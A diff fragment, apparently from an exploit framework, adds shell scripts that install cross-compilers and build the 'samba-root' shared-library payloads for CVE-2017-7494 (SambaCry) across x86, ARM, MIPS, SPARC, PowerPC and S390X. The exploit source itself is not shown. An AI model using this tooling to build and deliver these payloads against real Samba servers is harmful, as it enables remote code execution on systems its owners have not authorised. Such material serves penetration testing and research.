+  gcc-5-multilib-powerpc64-linux-gnu \
+  gcc-5-multilib-s390x-linux-gnu \
+  gcc-5-multilib-sparc64-linux-gnu \
+  gcc-4.9-powerpc64le-linux-gnu \
+  gcc-4.9-aarch64-linux-gnu
+
+if [ ! -e /usr/include/asm ];
+  then ln -sf /usr/include/asm-generic /usr/include/asm
+fi

data/exploits/CVE-2017-7494/build.sh

@@ -0,0 +1,48 @@
+#!/bin/bash
+
+build () {
+  CC=$1
+  TARGET_SUFFIX=$2
+  CFLAGS=$3
+
+  echo "[*] Building for ${TARGET_SUFFIX}..."
+  for type in {shellcode,system,findsock}
+   do ${CC} ${CFLAGS} -Wall -Werror -fPIC -fno-stack-protector samba-root-${type}.c -shared -o samba-root-${type}-${TARGET_SUFFIX}.so
+  done
+}
+
+rm -f *.o *.so *.gz
+
+#
+# Linux GLIBC
+#
+
+# x86
+build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
+build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
+
+# ARM
+build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
+build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
+build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
+
+# MIPS
+build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
+build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
+build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
+build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
+
+# SPARC
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
+
+# PowerPC
+build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
+build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
+build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
+
+# S390X
+build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
+
+gzip -9 *.so
+rm -f *.o *.so

data/exploits/CVE-2017-7494/install-deps.sh

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Assume x86_64 Ubuntu 16.04 base system
+apt-get install build-essential \
+  gcc-5-multilib \
+  gcc-5-multilib-arm-linux-gnueabi \
+  gcc-5-multilib-arm-linux-gnueabihf \
+  gcc-5-multilib-mips-linux-gnu \
+  gcc-5-multilib-mips64-linux-gnuabi64 \
+  gcc-5-multilib-mips64el-linux-gnuabi64 \
+  gcc-5-multilib-mipsel-linux-gnu \
+  gcc-5-multilib-powerpc-linux-gnu \
+  gcc-5-multilib-powerpc64-linux-gnu \
+  gcc-5-multilib-s390x-linux-gnu \
+  gcc-5-multilib-sparc64-linux-gnu \
+  gcc-4.9-powerpc64le-linux-gnu \
+  gcc-4.9-aarch64-linux-gnu
+
+if [ ! -e /usr/include/asm ];
+  then ln -sf /usr/include/asm-generic /usr/include/asm
+fi